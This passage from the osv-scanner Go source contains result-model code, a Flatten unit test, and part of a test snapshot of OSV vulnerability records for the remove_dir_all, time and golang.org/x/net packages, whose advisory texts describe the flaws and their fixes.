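	Source SourceInfo `json:"source"`
	// Place Annotations in PackageSource instead of SourceInfo as we need SourceInfo to be mappable
	ExperimentalPES []*vex.PackageExploitabilitySignal `json:"experimental_pes,omitempty"`
	Packages        []PackageVulns                     `json:"packages"`
}

// License is an SPDX license.
type License string

// PackageVulns grouped by package
// TODO: rename this to be Package as it now includes license information too.
type PackageVulns struct {
	Package           PackageInfo                `json:"package"`
	DepGroups         []string                   `json:"dependency_groups,omitempty"`
	Vulnerabilities   []*osvschema.Vulnerability `json:"vulnerabilities,omitempty"`
	Groups            []GroupInfo                `json:"groups,omitempty"`
	Licenses          []License                  `json:"licenses,omitempty"`
	LicenseViolations []License                  `json:"license_violations,omitempty"`
}

// MarshalJSON implements the json.Marshaler interface.
// It is required because the Vulnerabilities field is a slice of proto messages,
// which requires protojson to marshal, while the rest of the struct uses
// the standard encoding/json library.
func (p *PackageVulns) MarshalJSON() ([]byte, error) {
	// Use alias to avoid recursion: alias has the same fields but none of the
	// methods, so json.Marshal does not call MarshalJSON again.
	type alias PackageVulns

	// Pre-process the custom field. With no vulnerabilities the slice stays nil
	// and omitempty drops the key from the output.
	var rawVulnerabilities []json.RawMessage
	if len(p.Vulnerabilities) > 0 {
		rawVulnerabilities = make([]json.RawMessage, 0, len(p.Vulnerabilities))
		for _, vuln := range p.Vulnerabilities {
			// protojson does not promise byte-stable output, so each message is
			// decoded into a generic value and re-encoded with encoding/json.
			unstableJSON, err := protojson.Marshal(vuln)
			if err != nil {
				return nil, fmt.Errorf("failed to marshal vulnerability: %w", err)
			}

			// Named differently from the loop variable to avoid shadowing it.
			var generic any
			if err := json.Unmarshal(unstableJSON, &generic); err != nil {
				return nil, err
			}

			b, err := json.MarshalIndent(generic, "", " ")
			if err != nil {
				return nil, err
			}
			rawVulnerabilities = append(rawVulnerabilities, b)
		}
	}

	// Marshal a temporary struct that combines the standard
	// fields (from the alias) with the custom-handled field.
	return json.Marshal(&struct {
		*alias

		Vulnerabilities []json.RawMessage `json:"vulnerabilities,omitempty"`
	}{
		alias:           (*alias)(p),
		Vulnerabilities: rawVulnerabilities,
	})
}

// UnmarshalJSON implements the json.Unmarshaler interface.
// It is required because the Vulnerabilities field is a slice of proto messages,
// which requires protojson to unmarshal, while the rest of the struct uses
// the standard encoding/json library.
func (p *PackageVulns) UnmarshalJSON(data []byte) error {
	// Use alias to avoid recursion.
	type alias PackageVulns

	// Use temporary struct to combine standard fields (via alias)
	// and the manually processed field (via shadowing).
	tmp := &struct {
		*alias

		Vulnerabilities []json.RawMessage `json:"vulnerabilities,omitempty"`
	}{
		alias: (*alias)(p),
	}

	// Unmarshal into the temporary struct. tmp is already a pointer. Passing
	// &tmp would let a JSON null (for example a null entry in a "packages"
	// array) reset tmp itself to nil, and the field access below would then
	// dereference nil. Decoding into tmp makes a null input a no-op, which is
	// what encoding/json expects of an Unmarshaler.
	if err := json.Unmarshal(data, tmp); err != nil {
		return err
	}

	// Manually process the custom field from RawMessage format.
	if len(tmp.Vulnerabilities) > 0 {
		p.Vulnerabilities = make([]*osvschema.Vulnerability, 0, len(tmp.Vulnerabilities))
		for i, rawVuln := range tmp.Vulnerabilities {
			vuln := &osvschema.Vulnerability{}
			if err := protojson.Unmarshal(rawVuln, vuln); err != nil {
				return fmt.Errorf("failed to protojson unmarshal vulnerability at index %d: %w", i, err)
			}
			p.Vulnerabilities = append(p.Vulnerabilities, vuln)
		}
	}

	return nil
}

// GroupInfo describes one group of vulnerability IDs reported together.
type GroupInfo struct {
	// IDs expected to be sorted in alphanumeric order
	IDs []string `json:"ids"`
	// Aliases include all aliases and IDs
	Aliases []string `json:"aliases"`
	// Map of Vulnerability IDs to AnalysisInfo
	ExperimentalAnalysis map[string]AnalysisInfo `json:"experimental_analysis,omitempty"`
	MaxSeverity          string                  `json:"max_severity"`
}

// IsCalled returns true if any analysis performed determines that the vulnerability is being called
// Also returns true if no analysis is performed
func (groupInfo *GroupInfo) IsCalled() bool {
	// No analysis recorded: report the group as called.
	if len(groupInfo.ExperimentalAnalysis) == 0 {
		return true
	}

	for _, analysis := range groupInfo.ExperimentalAnalysis {
		if analysis.Called {
			return true
		}
	}

	return false
}

// IsGroupUnimportant reports whether at least one analysis entry in the group
// is marked Unimportant. It returns false when no analysis is recorded. A
// single Unimportant entry is enough to mark the whole group.
func (groupInfo *GroupInfo) IsGroupUnimportant() bool {
	if len(groupInfo.ExperimentalAnalysis) == 0 {
		return false
	}

	for _, analysis := range groupInfo.ExperimentalAnalysis {
		if analysis.Unimportant {
			return true
		}
	}

	return false
}

// IndexString joins the group's IDs with commas.
func (groupInfo *GroupInfo) IndexString() string {
	// Assumes IDs is sorted
	return strings.Join(groupInfo.IDs, ",")
}

// AnalysisInfo holds the per-vulnerability analysis flags read by
// GroupInfo.IsCalled and GroupInfo.IsGroupUnimportant.
type AnalysisInfo struct {
	Called      bool `json:"called"`
	Unimportant bool `json:"unimportant"`
}

// PackageInfo describes a package as reported in the results.
// Inventory is excluded from the JSON encoding.
type PackageInfo struct {
	Name          string              `json:"name"`
	OSPackageName string              `json:"os_package_name,omitempty"`
	Version       string              `json:"version"`
	Ecosystem     string              `json:"ecosystem"`
	Commit        string              `json:"commit,omitempty"`
	Deprecated    bool                `json:"deprecated,omitempty"`
	ImageOrigin   *ImageOriginDetails `json:"image_origin_details,omitempty"`
	Inventory     *extractor.Package  `json:"-"`
}

================================================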
FILE: pkg/models/results_test.go
================================================
package models_test

import (
	"testing"

	"github.com/google/go-cmp/cmp"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
	"google.golang.org/protobuf/testing/protocmp"
)

// TestFlatten checks Flatten against four inputs: no results, a package with
// a vulnerability, a package with only a license violation, and a package
// with both.
func TestFlatten(t *testing.T) {
	t.Parallel()

	// assertFlatten runs Flatten on input and reports any difference from want.
	assertFlatten := func(input models.VulnerabilityResults, want []models.VulnerabilityFlattened) {
		t.Helper()

		if diff := cmp.Diff(want, input.Flatten(), protocmp.Transform()); diff != "" {
			t.Errorf("Flatten() returned unexpected result (-want +got):\n%s", diff)
		}
	}

	// wrap places a single package under a source whose path is "package".
	wrap := func(p models.PackageVulns) (models.PackageSource, models.VulnerabilityResults) {
		src := models.PackageSource{Source: models.SourceInfo{Path: "package"}, Packages: []models.PackageVulns{p}}

		return src, models.VulnerabilityResults{Results: []models.PackageSource{src}}
	}

	// Fixtures shared by the cases below.
	group := models.GroupInfo{IDs: []string{"CVE-2021-1234"}}
	newVuln := func() *osvschema.Vulnerability {
		return &osvschema.Vulnerability{
			Id:       "CVE-2021-1234",
			Severity: []*osvschema.Severity{{Score: "1"}},
		}
	}

	// Test case 1: When there are no vulnerabilities
	assertFlatten(
		models.VulnerabilityResults{Results: []models.PackageSource{}},
		[]models.VulnerabilityFlattened{},
	)

	// Test case 2: When there are vulnerabilities
	pkg := models.PackageVulns{
		Package:         models.PackageInfo{Name: "package"},
		DepGroups:       []string{"dev"},
		Groups:          []models.GroupInfo{group},
		Vulnerabilities: []*osvschema.Vulnerability{newVuln()},
		Licenses:        []models.License{models.License("MIT")},
	}
	source, vulns := wrap(pkg)
	assertFlatten(vulns, []models.VulnerabilityFlattened{
		{
			Source:        source.Source,
			Package:       pkg.Package,
			DepGroups:     []string{"dev"},
			Vulnerability: pkg.Vulnerabilities[0],
			GroupInfo:     group,
		},
	})

	// Test case 3: When there are no vulnerabilities and license violations
	pkg = models.PackageVulns{
		Package:           models.PackageInfo{Name: "package"},
		DepGroups:         []string{"dev"},
		Groups:            []models.GroupInfo{group},
		Licenses:          []models.License{"MIT"},
		LicenseViolations: []models.License{"MIT"},
	}
	source, vulns = wrap(pkg)
	assertFlatten(vulns, []models.VulnerabilityFlattened{
		{
			Source:            source.Source,
			Package:           pkg.Package,
			DepGroups:         []string{"dev"},
			Licenses:          []models.License{"MIT"},
			LicenseViolations: []models.License{"MIT"},
		},
	})

	// Test case 4: When there are vulnerabilities and license violations
	pkg = models.PackageVulns{
		Package:           models.PackageInfo{Name: "package"},
		DepGroups:         []string{"dev"},
		Groups:            []models.GroupInfo{group},
		Vulnerabilities:   []*osvschema.Vulnerability{newVuln()},
		Licenses:          []models.License{"MIT"},
		LicenseViolations: []models.License{"MIT"},
	}
	source, vulns = wrap(pkg)
	assertFlatten(vulns, []models.VulnerabilityFlattened{
		{
			Source:        source.Source,
			Package:       pkg.Package,
			DepGroups:     []string{"dev"},
			Vulnerability: pkg.Vulnerabilities[0],
			GroupInfo:     group,
		},
		{
			Source:            source.Source,
			Package:           pkg.Package,
			DepGroups:         []string{"dev"},
			Licenses:          []models.License{"MIT"},
			LicenseViolations: []models.License{"MIT"},
		},
	})
}

================================================
FILE: pkg/osvscanner/__snapshots__/filter_internal_test.snap
================================================ [Test_filterResults/filter_everything - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [Test_filterResults/filter_nothing - 1] { "results": [ { "source": { "path": "testdata/filter/none/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" }, "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ], "type": "SEMVER" } ] } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" }, "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. 
It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "schema_version": "1.4.0", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all" }, { "affected": [ { "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } }, "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent 
directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). 
Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ], "schema_version": "1.4.0", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)" } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ 
"time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" }, "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. 
If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "schema_version": "1.4.0", "summary": "Segmentation fault in time" }, { "affected": [ { "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", 
"android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. 
This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ], "schema_version": "1.4.0", "summary": "Potential segfault in the time crate" } ] } ] }, { "source": { "path": "testdata/filter/none/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "aliases": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "max_severity": "" }, { "ids": [ "GO-2022-1144" ], "aliases": [ "GO-2022-1144" ], 
"max_severity": "" }, { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/net/http2/h2c", "purl": "pkg:golang/golang.org/x/net/http2/h2c" }, "ranges": [ { "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41721" ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T22:40:06Z", "nvd_published_at": "2023-01-13T23:15:00Z", "severity": "HIGH" }, "details": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. 
When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "id": "GHSA-fxg5-wq6x-vr4w", "modified": "2023-01-24T18:56:46Z", "published": "2023-01-14T00:30:23Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721" }, { "type": "PACKAGE", "url": "https://cs.opensource.google/go/x/net" }, { "type": "WEB", "url": "https://go.dev/cl/447396" }, { "type": "WEB", "url": "https://go.dev/issue/56352" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1495" } ], "schema_version": "1.4.0", "summary": "golang.org/x/net/http2/h2c vulnerable to request smuggling attack" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1495.json", "url": "https://pkg.go.dev/vuln/GO-2023-1495" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2/h2c", "symbols": [ "h2cHandler.ServeHTTP", "h2cUpgrade" ] } ] }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41721", "GHSA-fxg5-wq6x-vr4w" ], "details": "A request smuggling attack is possible when using MaxBytesHandler.\n\nWhen using MaxBytesHandler, the body of an HTTP request is not fully consumed. 
When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "id": "GO-2023-1495", "modified": "2023-01-31T21:39:17Z", "published": "2023-01-13T22:39:40Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56352" }, { "type": "FIX", "url": "https://go.dev/cl/447396" } ], "schema_version": "1.4.0" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "net/http", "symbols": [ "ListenAndServe", "ListenAndServeTLS", "Serve", "ServeTLS", "Server.ListenAndServe", "Server.ListenAndServeTLS", "Server.Serve", "Server.ServeTLS", "http2Server.ServeConn", "http2serverConn.canonicalHeader" ] } ] }, "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.18.9" }, { "introduced": "1.19.0" }, { "fixed": "1.19.4" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2", "symbols": [ "Server.ServeConn", "serverConn.canonicalHeader" ] } ] }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41717", "GHSA-xrjj-mj9h-534m" ], "details": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.\n\nHTTP/2 server connections contain a cache of HTTP header keys sent by the client. 
While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "id": "GO-2022-1144", "modified": "2023-01-31T21:39:15Z", "published": "2022-12-08T19:01:21Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56350" }, { "type": "FIX", "url": "https://go.dev/cl/455717" }, { "type": "FIX", "url": "https://go.dev/cl/455635" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ" } ], "schema_version": "1.4.0" }, { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41723" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" }, "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "id": "GHSA-vvpx-j8f3-3w6h", "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "schema_version": "1.4.0", 
"summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ] }, "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "id": "GO-2023-1571", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "references": [ { "type": "REPORT", "url": 